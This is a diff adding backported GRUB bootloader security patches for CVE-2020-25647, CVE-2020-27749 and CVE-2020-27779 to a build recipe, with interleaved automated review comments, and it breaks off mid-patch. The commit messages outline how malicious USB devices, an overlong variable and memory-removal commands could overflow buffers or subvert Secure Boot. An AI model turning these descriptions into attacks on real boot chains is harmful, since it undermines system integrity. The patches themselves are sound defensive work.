++extern int EXPORT_FUNC(grub_dl_ref_count) (grub_dl_t mod);
++
+ extern grub_dl_t EXPORT_VAR(grub_dl_head);
+
+ #ifndef GRUB_UTIL
+--
+2.33.0
+
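Review bot: The `grub_dl_ref_count (mod) > 1` test in `grub_mini_cmd_rmmod ()` relies on an unstated convention, presumably that a module with no dependants holds at most one reference. A comment should record it, e.g. `/* A count above 1 means another module still depends on this one; unloading it would leave dangling references. */`. The result of `grub_dl_unload (mod)`, declared `int` in include/grub/dl.h, is now discarded, so the command returns 0 whatever the unload did. The new `grub_dl_ref_count ()` in kern/dl.c would also benefit from a one-line comment saying it returns 0 for a NULL module. `grub_mini_cmd_rmmod ()` starts outside the hunk.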
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-25647.patch b/meta/recipes-bsp/grub/files/CVE-2020-25647.patch
new file mode 100644
index 0000000000..cb77fd4772
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-25647.patch
@@ -0,0 +1,119 @@
+From 128c16a682034263eb519c89bc0934eeb6fa8cfa Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Fri, 11 Dec 2020 19:19:21 +0100
+Subject: [PATCH] usb: Avoid possible out-of-bound accesses caused by malicious
+ devices
+
+The maximum number of configurations and interfaces are fixed but there is
+no out-of-bound checking to prevent a malicious USB device to report large
+values for these and cause accesses outside the arrays' memory.
+
+Fixes: CVE-2020-25647
+
+Reported-by: Joseph Tartaro <joseph.tartaro@ioactive.com>
+Reported-by: Ilja Van Sprundel <ivansprundel@ioactive.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=128c16a682034263eb519c89bc0934eeb6fa8cfa]
+CVE: CVE-2020-25647
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/bus/usb/usb.c | 15 ++++++++++++---
+ include/grub/usb.h | 10 +++++++---
+ 2 files changed, 19 insertions(+), 6 deletions(-)
+
+diff --git a/grub-core/bus/usb/usb.c b/grub-core/bus/usb/usb.c
+index 8da5e4c74..7cb3cc230 100644
+--- a/grub-core/bus/usb/usb.c
++++ b/grub-core/bus/usb/usb.c
+@@ -75,6 +75,9 @@ grub_usb_controller_iterate (grub_usb_controller_iterate_hook_t hook,
+ grub_usb_err_t
+ grub_usb_clear_halt (grub_usb_device_t dev, int endpoint)
+ {
++ if (endpoint >= GRUB_USB_MAX_TOGGLE)
++ return GRUB_USB_ERR_BADDEVICE;
++
+ dev->toggle[endpoint] = 0;
+ return grub_usb_control_msg (dev, (GRUB_USB_REQTYPE_OUT
+ | GRUB_USB_REQTYPE_STANDARD
+@@ -134,10 +137,10 @@ grub_usb_device_initialize (grub_usb_device_t dev)
+ return err;
+ descdev = &dev->descdev;
+
+- for (i = 0; i < 8; i++)
++ for (i = 0; i < GRUB_USB_MAX_CONF; i++)
+ dev->config[i].descconf = NULL;
+
+- if (descdev->configcnt == 0)
++ if (descdev->configcnt == 0 || descdev->configcnt > GRUB_USB_MAX_CONF)
+ {
+ err = GRUB_USB_ERR_BADDEVICE;
+ goto fail;
+@@ -172,6 +175,12 @@ grub_usb_device_initialize (grub_usb_device_t dev)
+ /* Skip the configuration descriptor. */
+ pos = dev->config[i].descconf->length;
+
++ if (dev->config[i].descconf->numif > GRUB_USB_MAX_IF)
++ {
++ err = GRUB_USB_ERR_BADDEVICE;
++ goto fail;
++ }
++
+ /* Read all interfaces. */
+ for (currif = 0; currif < dev->config[i].descconf->numif; currif++)
+ {
+@@ -217,7 +226,7 @@ grub_usb_device_initialize (grub_usb_device_t dev)
+
+ fail:
+
+- for (i = 0; i < 8; i++)
++ for (i = 0; i < GRUB_USB_MAX_CONF; i++)
+ grub_free (dev->config[i].descconf);
+
+ return err;
+diff --git a/include/grub/usb.h b/include/grub/usb.h
+index 512ae1dd0..6475c552f 100644
+--- a/include/grub/usb.h
++++ b/include/grub/usb.h
+@@ -23,6 +23,10 @@
+ #include <grub/usbdesc.h>
+ #include <grub/usbtrans.h>
+
++#define GRUB_USB_MAX_CONF 8
++#define GRUB_USB_MAX_IF 32
++#define GRUB_USB_MAX_TOGGLE 256
++
+ typedef struct grub_usb_device *grub_usb_device_t;
+ typedef struct grub_usb_controller *grub_usb_controller_t;
+ typedef struct grub_usb_controller_dev *grub_usb_controller_dev_t;
+@@ -167,7 +171,7 @@ struct grub_usb_configuration
+ struct grub_usb_desc_config *descconf;
+
+ /* Interfaces associated to this configuration. */
+- struct grub_usb_interface interf[32];
++ struct grub_usb_interface interf[GRUB_USB_MAX_IF];
+ };
+
+ struct grub_usb_hub_port
+@@ -191,7 +195,7 @@ struct grub_usb_device
+ struct grub_usb_controller controller;
+
+ /* Device configurations (after opening the device). */
+- struct grub_usb_configuration config[8];
++ struct grub_usb_configuration config[GRUB_USB_MAX_CONF];
+
+ /* Device address. */
+ int addr;
+@@ -203,7 +207,7 @@ struct grub_usb_device
+ int initialized;
+
+ /* Data toggle values (used for bulk transfers only). */
+- int toggle[256];
++ int toggle[GRUB_USB_MAX_TOGGLE];
+
+ /* Used by libusb wrapper. Schedulded for removal. */
+ void *data;
+--
+2.33.0
+
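Review bot: The new guard in `grub_usb_clear_halt ()` checks only the upper bound, and `endpoint` is a signed `int`, so a negative value still reaches `dev->toggle[endpoint]`. The check should cover both ends: `if (endpoint < 0 || endpoint >= GRUB_USB_MAX_TOGGLE)`. Whether any caller can pass a negative endpoint is not visible here, but the extra comparison matches the intent of the fix. The function body continues outside the hunk.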
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27749.patch b/meta/recipes-bsp/grub/files/CVE-2020-27749.patch
new file mode 100644
index 0000000000..a2566b2ded
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27749.patch
@@ -0,0 +1,609 @@
+From 4ea7bae51f97e49c84dc67ea30b466ca8633b9f6 Mon Sep 17 00:00:00 2001
+From: Chris Coulson <chris.coulson@canonical.com>
+Date: Thu, 7 Jan 2021 19:21:03 +0000
+Subject: kern/parser: Fix a stack buffer overflow
+
+grub_parser_split_cmdline() expands variable names present in the supplied
+command line in to their corresponding variable contents and uses a 1 kiB
+stack buffer for temporary storage without sufficient bounds checking. If
+the function is called with a command line that references a variable with
+a sufficiently large payload, it is possible to overflow the stack
+buffer via tab completion, corrupt the stack frame and potentially
+control execution.
+
+Fixes: CVE-2020-27749
+
+Reported-by: Chris Coulson <chris.coulson@canonical.com>
+Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=c6c426e5ab6ea715153b72584de6bd8c82f698ec && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=b1c9e9e889e4273fb15712051c887e6078511448 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=3d157bbd06506b170fde5ec23980c4bf9f7660e2 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=8bc817014ce3d7a498db44eae33c8b90e2430926 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=030fb6c4fa354cdbd6a8d6903dfed5d36eaf3cb2 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=4ea7bae51f97e49c84dc67ea30b466ca8633b9f6]
+CVE: CVE-2020-27749
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/Makefile.core.def | 1 +
+ grub-core/kern/buffer.c | 117 +++++++++++++++++++++
+ grub-core/kern/parser.c | 204 +++++++++++++++++++++++-------------
+ include/grub/buffer.h | 144 +++++++++++++++++++++++++
+ 4 files changed, 395 insertions(+), 71 deletions(-)
+ create mode 100644 grub-core/kern/buffer.c
+ create mode 100644 include/grub/buffer.h
+
+diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
+index 651ea2a..823cd57 100644
+--- a/grub-core/Makefile.core.def
++++ b/grub-core/Makefile.core.def
+@@ -123,6 +123,7 @@ kernel = {
+ riscv32_efi_startup = kern/riscv/efi/startup.S;
+ riscv64_efi_startup = kern/riscv/efi/startup.S;
+
++ common = kern/buffer.c;
+ common = kern/command.c;
+ common = kern/corecmd.c;
+ common = kern/device.c;
+diff --git a/grub-core/kern/buffer.c b/grub-core/kern/buffer.c
+new file mode 100644
+index 0000000..9f5f8b8
+--- /dev/null
++++ b/grub-core/kern/buffer.c
+@@ -0,0 +1,117 @@
++/*
++ * GRUB -- GRand Unified Bootloader
++ * Copyright (C) 2021 Free Software Foundation, Inc.
++ *
++ * GRUB is free software: you can redistribute it and/or modify
++ * it under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GRUB is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
++ */
++
++#include <grub/buffer.h>
++#include <grub/err.h>
++#include <grub/misc.h>
++#include <grub/mm.h>
++#include <grub/safemath.h>
++#include <grub/types.h>
++
++grub_buffer_t
++grub_buffer_new (grub_size_t sz)
++{
++ struct grub_buffer *ret;
++
++ ret = (struct grub_buffer *) grub_malloc (sizeof (*ret));
++ if (ret == NULL)
++ return NULL;
++
++ ret->data = (grub_uint8_t *) grub_malloc (sz);
++ if (ret->data == NULL)
++ {
++ grub_free (ret);
++ return NULL;
++ }
++
++ ret->sz = sz;
++ ret->pos = 0;
++ ret->used = 0;
++
++ return ret;
++}
++
++void
++grub_buffer_free (grub_buffer_t buf)
++{
++ grub_free (buf->data);
++ grub_free (buf);
++}
++
++grub_err_t
++grub_buffer_ensure_space (grub_buffer_t buf, grub_size_t req)
++{
++ grub_uint8_t *d;
++ grub_size_t newsz = 1;
++
++ /* Is the current buffer size adequate? */
++ if (buf->sz >= req)
++ return GRUB_ERR_NONE;
++
++ /* Find the smallest power-of-2 size that satisfies the request. */
++ while (newsz < req)
++ {
++ if (newsz == 0)
++ return grub_error (GRUB_ERR_OUT_OF_RANGE,
++ N_("requested buffer size is too large"));
++ newsz <<= 1;
++ }
++
++ d = (grub_uint8_t *) grub_realloc (buf->data, newsz);
++ if (d == NULL)
++ return grub_errno;
++
++ buf->data = d;
++ buf->sz = newsz;
++
++ return GRUB_ERR_NONE;
++}
++
++void *
++grub_buffer_take_data (grub_buffer_t buf)
++{
++ void *data = buf->data;
++
++ buf->data = NULL;
++ buf->sz = buf->pos = buf->used = 0;
++
++ return data;
++}
++
++void
++grub_buffer_reset (grub_buffer_t buf)
++{
++ buf->pos = buf->used = 0;
++}
++
++grub_err_t
++grub_buffer_advance_read_pos (grub_buffer_t buf, grub_size_t n)
++{
++ grub_size_t newpos;
++
++ if (grub_add (buf->pos, n, &newpos))
++ return grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected"));
++
++ if (newpos > buf->used)
++ return grub_error (GRUB_ERR_OUT_OF_RANGE,
++ N_("new read is position beyond the end of the written data"));
++
++ buf->pos = newpos;
++
++ return GRUB_ERR_NONE;
++}
+diff --git a/grub-core/kern/parser.c b/grub-core/kern/parser.c
+index d1cf061..6ab7aa4 100644
+--- a/grub-core/kern/parser.c
++++ b/grub-core/kern/parser.c
+@@ -1,7 +1,7 @@
+ /* parser.c - the part of the parser that can return partial tokens */
+ /*
+ * GRUB -- GRand Unified Bootloader
+- * Copyright (C) 2005,2007,2009 Free Software Foundation, Inc.
++ * Copyright (C) 2005,2007,2009,2021 Free Software Foundation, Inc.
+ *
+ * GRUB is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+@@ -18,6 +18,7 @@
+ */
+
+ #include <grub/parser.h>
++#include <grub/buffer.h>
+ #include <grub/env.h>
+ #include <grub/misc.h>
+ #include <grub/mm.h>
+@@ -107,8 +108,8 @@ check_varstate (grub_parser_state_t s)
+ }
+
+
+-static void
+-add_var (char *varname, char **bp, char **vp,
++static grub_err_t
++add_var (grub_buffer_t varname, grub_buffer_t buf,
+ grub_parser_state_t state, grub_parser_state_t newstate)
+ {
+ const char *val;
+@@ -116,17 +117,74 @@ add_var (char *varname, char **bp, char **vp,
+ /* Check if a variable was being read in and the end of the name
+ was reached. */
+ if (!(check_varstate (state) && !check_varstate (newstate)))
+- return;
++ return GRUB_ERR_NONE;
++
++ if (grub_buffer_append_char (varname, '\0') != GRUB_ERR_NONE)
++ return grub_errno;
+
+- *((*vp)++) = '\0';
+- val = grub_env_get (varname);
+- *vp = varname;
++ val = grub_env_get ((const char *) grub_buffer_peek_data (varname));
++ grub_buffer_reset (varname);
+ if (!val)
+- return;
++ return GRUB_ERR_NONE;
+
+ /* Insert the contents of the variable in the buffer. */
+- for (; *val; val++)
+- *((*bp)++) = *val;
++ return grub_buffer_append_data (buf, val, grub_strlen (val));
++}
++
++static grub_err_t
++terminate_arg (grub_buffer_t buffer, int *argc)
++{
++ grub_size_t unread = grub_buffer_get_unread_bytes (buffer);
++
++ if (unread == 0)
++ return GRUB_ERR_NONE;
++
++ if (*(const char *) grub_buffer_peek_data_at (buffer, unread - 1) == '\0')
++ return GRUB_ERR_NONE;
++
++ if (grub_buffer_append_char (buffer, '\0') != GRUB_ERR_NONE)
++ return grub_errno;
++
++ (*argc)++;
++
++ return GRUB_ERR_NONE;
++}
++
++static grub_err_t
++process_char (char c, grub_buffer_t buffer, grub_buffer_t varname,
++ grub_parser_state_t state, int *argc,
++ grub_parser_state_t *newstate)
++{
++ char use;
++
++ *newstate = grub_parser_cmdline_state (state, c, &use);
++
++ /*
++ * If a variable was being processed and this character does
++ * not describe the variable anymore, write the variable to
++ * the buffer.
++ */
++ if (add_var (varname, buffer, state, *newstate) != GRUB_ERR_NONE)
++ return grub_errno;
++
++ if (check_varstate (*newstate))
++ {
++ if (use)
++ return grub_buffer_append_char (varname, use);
++ }
++ else if (*newstate == GRUB_PARSER_STATE_TEXT &&
++ state != GRUB_PARSER_STATE_ESC && grub_isspace (use))
++ {
++ /*
++ * Don't add more than one argument if multiple
++ * spaces are used.
++ */
++ return terminate_arg (buffer, argc);
++ }
++ else if (use)
++ return grub_buffer_append_char (buffer, use);
++
++ return GRUB_ERR_NONE;
+ }
+
+ grub_err_t
+@@ -135,24 +193,36 @@ grub_parser_split_cmdline (const char *cmdline,
+ int *argc, char ***argv)
+ {
+ grub_parser_state_t state = GRUB_PARSER_STATE_TEXT;
+- /* XXX: Fixed size buffer, perhaps this buffer should be dynamically
+- allocated. */
+- char buffer[1024];
+- char *bp = buffer;
++ grub_buffer_t buffer, varname;
+ char *rd = (char *) cmdline;
+- char varname[200];
+- char *vp = varname;
+- char *args;
++ char *rp = rd;
+ int i;
+
+ *argc = 0;
+ *argv = NULL;
++
++ buffer = grub_buffer_new (1024);
++ if (buffer == NULL)
++ return grub_errno;
++
++ varname = grub_buffer_new (200);
++ if (varname == NULL)
++ goto fail;
++
+ do
+ {
+- if (!rd || !*rd)
++ if (rp == NULL || *rp == '\0')
+ {
++ if (rd != cmdline)
++ {
++ grub_free (rd);
++ rd = rp = NULL;
++ }
+ if (getline)
+- getline (&rd, 1, getline_data);
++ {
++ getline (&rd, 1, getline_data);
++ rp = rd;
++ }
+ else
+ break;
+ }
+@@ -160,39 +230,14 @@ grub_parser_split_cmdline (const char *cmdline,
+ if (!rd)
+ break;
+
+- for (; *rd; rd++)
++ for (; *rp != '\0'; rp++)
+ {
+ grub_parser_state_t newstate;
+- char use;
+
+- newstate = grub_parser_cmdline_state (state, *rd, &use);
++ if (process_char (*rp, buffer, varname, state, argc,
++ &newstate) != GRUB_ERR_NONE)
++ goto fail;
+
+- /* If a variable was being processed and this character does
+- not describe the variable anymore, write the variable to
+- the buffer. */
+- add_var (varname, &bp, &vp, state, newstate);
+-
+- if (check_varstate (newstate))
+- {
+- if (use)
+- *(vp++) = use;
+- }
+- else
+- {
+- if (newstate == GRUB_PARSER_STATE_TEXT
+- && state != GRUB_PARSER_STATE_ESC && grub_isspace (use))
+- {
+- /* Don't add more than one argument if multiple
+- spaces are used. */
+- if (bp != buffer && *(bp - 1))
+- {
+- *(bp++) = '\0';
+- (*argc)++;
+- }
+- }
+- else if (use)
+- *(bp++) = use;
+- }
+ state = newstate;
+ }
+ }
+@@ -200,43 +245,60 @@ grub_parser_split_cmdline (const char *cmdline,
+
+ /* A special case for when the last character was part of a
+ variable. */
+- add_var (varname, &bp, &vp, state, GRUB_PARSER_STATE_TEXT);
++ if (add_var (varname, buffer, state, GRUB_PARSER_STATE_TEXT) != GRUB_ERR_NONE)
++ goto fail;
+
+- if (bp != buffer && *(bp - 1))
+- {
+- *(bp++) = '\0';
+- (*argc)++;
+- }
++ /* Ensure that the last argument is terminated. */
++ if (terminate_arg (buffer, argc) != GRUB_ERR_NONE)
++ goto fail;
+
+ /* If there are no args, then we're done. */
+ if (!*argc)
+- return 0;
+-
+- /* Reserve memory for the return values. */
+- args = grub_malloc (bp - buffer);
+- if (!args)
+- return grub_errno;
+- grub_memcpy (args, buffer, bp - buffer);
++ {
++ grub_errno = GRUB_ERR_NONE;
++ goto out;
++ }
+
+ *argv = grub_calloc (*argc + 1, sizeof (char *));
+ if (!*argv)
+- {
+- grub_free (args);
+- return grub_errno;
+- }
++ goto fail;
+
+ /* The arguments are separated with 0's, setup argv so it points to
+ the right values. */
+- bp = args;
+ for (i = 0; i < *argc; i++)
+ {
+- (*argv)[i] = bp;
+- while (*bp)
+- bp++;
+- bp++;
++ char *arg;
++
++ if (i > 0)
++ {
++ if (grub_buffer_advance_read_pos (buffer, 1) != GRUB_ERR_NONE)
++ goto fail;
++ }
++
++ arg = (char *) grub_buffer_peek_data (buffer);
++ if (arg == NULL ||
++ grub_buffer_advance_read_pos (buffer, grub_strlen (arg)) != GRUB_ERR_NONE)
++ goto fail;
++
++ (*argv)[i] = arg;
+ }
+
+- return 0;
++ /* Keep memory for the return values. */
++ grub_buffer_take_data (buffer);
++
++ grub_errno = GRUB_ERR_NONE;
++
++ out:
++ if (rd != cmdline)
++ grub_free (rd);
++ grub_buffer_free (buffer);
++ grub_buffer_free (varname);
++
++ return grub_errno;
++
++ fail:
++ grub_free (*argv);
++ goto out;
+ }
+
+ /* Helper for grub_parser_execute. */
+diff --git a/include/grub/buffer.h b/include/grub/buffer.h
+new file mode 100644
+index 0000000..f4b10cf
+--- /dev/null
++++ b/include/grub/buffer.h
+@@ -0,0 +1,144 @@
++/*
++ * GRUB -- GRand Unified Bootloader
++ * Copyright (C) 2021 Free Software Foundation, Inc.
++ *
++ * GRUB is free software: you can redistribute it and/or modify
++ * it under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GRUB is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
++ */
++
++#ifndef GRUB_BUFFER_H
++#define GRUB_BUFFER_H 1
++
++#include <grub/err.h>
++#include <grub/misc.h>
++#include <grub/mm.h>
++#include <grub/safemath.h>
++#include <grub/types.h>
++
++struct grub_buffer
++{
++ grub_uint8_t *data;
++ grub_size_t sz;
++ grub_size_t pos;
++ grub_size_t used;
++};
++
++/*
++ * grub_buffer_t represents a simple variable sized byte buffer with
++ * read and write cursors. It currently only implements
++ * functionality required by the only user in GRUB (append byte[s],
++ * peeking data at a specified position and updating the read cursor.
++ * Some things that this doesn't do yet are:
++ * - Reading a portion of the buffer by copying data from the current
++ * read position in to a caller supplied destination buffer and then
++ * automatically updating the read cursor.
++ * - Dropping the read part at the start of the buffer when an append
++ * requires more space.
++ */
++typedef struct grub_buffer *grub_buffer_t;
++
++/* Allocate a new buffer with the specified initial size. */
++extern grub_buffer_t grub_buffer_new (grub_size_t sz);
++
++/* Free the buffer and its resources. */
++extern void grub_buffer_free (grub_buffer_t buf);
++
++/* Return the number of unread bytes in this buffer. */
++static inline grub_size_t
++grub_buffer_get_unread_bytes (grub_buffer_t buf)
++{
++ return buf->used - buf->pos;
++}
++
++/*
++ * Ensure that the buffer size is at least the requested
++ * number of bytes.
++ */
++extern grub_err_t grub_buffer_ensure_space (grub_buffer_t buf, grub_size_t req);
++
++/*
++ * Append the specified number of bytes from the supplied
++ * data to the buffer.
++ */
++static inline grub_err_t
++grub_buffer_append_data (grub_buffer_t buf, const void *data, grub_size_t len)
++{
++ grub_size_t req;
++
++ if (grub_add (buf->used, len, &req))
++ return grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected"));
++
++ if (grub_buffer_ensure_space (buf, req) != GRUB_ERR_NONE)
++ return grub_errno;
++
++ grub_memcpy (&buf->data[buf->used], data, len);
++ buf->used = req;
++
++ return GRUB_ERR_NONE;
++}
++
++/* Append the supplied character to the buffer. */
++static inline grub_err_t
++grub_buffer_append_char (grub_buffer_t buf, char c)
++{
++ return grub_buffer_append_data (buf, &c, 1);
++}
++
++/*
++ * Forget and return the underlying data buffer. The caller
++ * becomes the owner of this buffer, and must free it when it
++ * is no longer required.
++ */
++extern void *grub_buffer_take_data (grub_buffer_t buf);
++
++/* Reset this buffer. Note that this does not deallocate any resources. */
++void grub_buffer_reset (grub_buffer_t buf);
++
++/*
++ * Return a pointer to the underlying data buffer at the specified
++ * offset from the current read position. Note that this pointer may
++ * become invalid if the buffer is mutated further.
++ */
++static inline void *
++grub_buffer_peek_data_at (grub_buffer_t buf, grub_size_t off)
++{
++ if (grub_add (buf->pos, off, &off))
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected."));
++ return NULL;
++ }
++
++ if (off >= buf->used)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE, N_("peek out of range"));
++ return NULL;
++ }
++
++ return &buf->data[off];
++}
++
++/*
++ * Return a pointer to the underlying data buffer at the current
++ * read position. Note that this pointer may become invalid if the
++ * buffer is mutated further.
++ */
++static inline void *
++grub_buffer_peek_data (grub_buffer_t buf)
++{
++ return grub_buffer_peek_data_at (buf, 0);
++}
++
++/* Advance the read position by the specified number of bytes. */
++extern grub_err_t grub_buffer_advance_read_pos (grub_buffer_t buf, grub_size_t n);
++
++#endif /* GRUB_BUFFER_H */
+--
+2.25.1
+
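Review bot: `grub_buffer_free()` in the new grub-core/kern/buffer.c dereferences `buf` without a NULL check, and `grub_parser_split_cmdline()` can reach it with a NULL `varname`. When `grub_buffer_new (200)` fails, the code jumps to `fail` and then `out`, where `grub_buffer_free (varname)` reads `buf->data`, so an out-of-memory condition in the parser becomes a NULL dereference instead of a clean error return. Starting the function with `if (buf == NULL) return;` fixes this. Separately, the `fail` path frees `*argv` but leaves the pointer and `*argc` unchanged, so a caller that does not check the return value would see a dangling pointer; `*argv = NULL; *argc = 0;` before `goto out;` would prevent that.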
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779.patch
new file mode 100644
index 0000000000..c82423b8af
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779.patch
@@ -0,0 +1,70 @@
+From 584263eca1546e5cab69ba6fe7b4b07df2630a21 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 14 Oct 2020 16:33:42 +0200
+Subject: [PATCH] mmap: Don't register cutmem and badram commands when lockdown
+ is enforced
+
+The cutmem and badram commands can be used to remove EFI memory regions
+and potentially disable the UEFI Secure Boot. Prevent the commands to be
+registered if the GRUB is locked down.
+
+Fixes: CVE-2020-27779
+
+Reported-by: Teddy Reed <teddy.reed@gmail.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d298b41f90cbf1f2e5a10e29daa1fc92ddee52c9]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 4 ++++
+ grub-core/mmap/mmap.c | 13 +++++++------
+ 2 files changed, 11 insertions(+), 6 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 47ac7ff..a1aaee6 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -4051,6 +4051,10 @@ this page is to be filtered. This syntax makes it easy to represent patterns
+ that are often result of memory damage, due to physical distribution of memory
+ cells.
+
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ This prevents removing EFI memory regions to potentially subvert the
++ security mechanisms provided by the UEFI secure boot.
++
+ @node blocklist
+ @subsection blocklist
+
+diff --git a/grub-core/mmap/mmap.c b/grub-core/mmap/mmap.c
+index 57b4e9a..7ebf32e 100644
+--- a/grub-core/mmap/mmap.c
++++ b/grub-core/mmap/mmap.c
+@@ -20,6 +20,7 @@
+ #include <grub/memory.h>
+ #include <grub/machine/memory.h>
+ #include <grub/err.h>
++#include <grub/lockdown.h>
+ #include <grub/misc.h>
+ #include <grub/mm.h>
+ #include <grub/command.h>
+@@ -534,12 +535,12 @@ static grub_command_t cmd, cmd_cut;
+
+ GRUB_MOD_INIT(mmap)
+ {
+- cmd = grub_register_command ("badram", grub_cmd_badram,
+- N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"),
+- N_("Declare memory regions as faulty (badram)."));
+- cmd_cut = grub_register_command ("cutmem", grub_cmd_cutmem,
+- N_("FROM[K|M|G] TO[K|M|G]"),
+- N_("Remove any memory regions in specified range."));
++ cmd = grub_register_command_lockdown ("badram", grub_cmd_badram,
++ N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"),
++ N_("Declare memory regions as faulty (badram)."));
++ cmd_cut = grub_register_command_lockdown ("cutmem", grub_cmd_cutmem,
++ N_("FROM[K|M|G] TO[K|M|G]"),
++ N_("Remove any memory regions in specified range."));
+
+ }
+
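Review bot: The lockdown helpers used in grub-core/mmap/mmap.c are not defined in this patch: `grub_register_command_lockdown()` and `<grub/lockdown.h>` have to come from another patch applied earlier in the series. The same holds for CVE-2020-27779_2.patch through CVE-2020-27779_6.patch, which also rely on `grub_register_extcmd_lockdown()`. The recipe's patch ordering is not visible in this part of the diff, so it is worth confirming that the lockdown infrastructure patch is listed ahead of these and recording the prerequisite in each patch header, for example `Depends on: <lockdown infrastructure patch>`. If the series is applied only partially, some of these commands stay unrestricted while the image still carries the CVE-2020-27779 tag.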
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch
new file mode 100644
index 0000000000..e33c96a05b
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch
@@ -0,0 +1,105 @@
+From 4ff1dfdf8c4c71bf4b0dd0488d9fa40ff2617f41 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 09:00:05 +0100
+Subject: [PATCH] commands: Restrict commands that can load BIOS or DT blobs
+ when locked down
+
+There are some more commands that should be restricted when the GRUB is
+locked down. Following is the list of commands and reasons to restrict:
+
+ * fakebios: creates BIOS-like structures for backward compatibility with
+ existing OSes. This should not be allowed when locked down.
+
+ * loadbios: reads a BIOS dump from storage and loads it. This action
+ should not be allowed when locked down.
+
+ * devicetree: loads a Device Tree blob and passes it to the OS. It replaces
+ any Device Tree provided by the firmware. This also should
+ not be allowed when locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=468a5699b249fe6816b4e7e86c5dc9d325c9b09e]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 3 +++
+ grub-core/commands/efi/loadbios.c | 16 ++++++++--------
+ grub-core/loader/arm/linux.c | 6 +++---
+ grub-core/loader/efi/fdt.c | 4 ++--
+ 4 files changed, 16 insertions(+), 13 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index a1aaee6..ccf1908 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -4236,6 +4236,9 @@ Load a device tree blob (.dtb) from a filesystem, for later use by a Linux
+ kernel. Does not perform merging with any device tree supplied by firmware,
+ but rather replaces it completely.
+ @ref{GNU/Linux}.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ This is done to prevent subverting various security mechanisms.
+ @end deffn
+
+ @node distrust
+diff --git a/grub-core/commands/efi/loadbios.c b/grub-core/commands/efi/loadbios.c
+index d41d521..5c7725f 100644
+--- a/grub-core/commands/efi/loadbios.c
++++ b/grub-core/commands/efi/loadbios.c
+@@ -205,14 +205,14 @@ static grub_command_t cmd_fakebios, cmd_loadbios;
+
+ GRUB_MOD_INIT(loadbios)
+ {
+- cmd_fakebios = grub_register_command ("fakebios", grub_cmd_fakebios,
+- 0, N_("Create BIOS-like structures for"
+- " backward compatibility with"
+- " existing OS."));
+-
+- cmd_loadbios = grub_register_command ("loadbios", grub_cmd_loadbios,
